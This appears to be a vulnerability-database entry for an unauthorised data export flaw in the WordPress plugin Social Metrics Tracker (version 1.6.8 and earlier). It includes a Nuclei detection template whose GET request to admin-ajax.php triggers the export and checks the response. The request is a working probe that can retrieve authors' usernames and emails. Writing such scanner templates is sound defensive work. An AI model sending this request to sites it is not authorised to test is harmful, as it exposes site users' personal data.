漏洞描述
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
wordpress-social-metrics-tracker: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
PoC代码[已公开]
id: wordpress-social-metrics-tracker
info:
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
author: randomrobbie
severity: medium
description: |
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
reference:
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
metadata:
max-request: 1
tags: wordpress,wp-plugin,wp,unauth,wpscan,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Main URL to Post"
- type: status
status:
- 200
# digest: 4a0a0047304502210081a4772278e4967a96d900776ed4de6a5ad21e74232ca8848cc90c4d998bace902205615299aee0abb7269972726981c8a90f52f01411568d95992aab7815c6cad0f:922c64590222798bb761d5b6d8e72950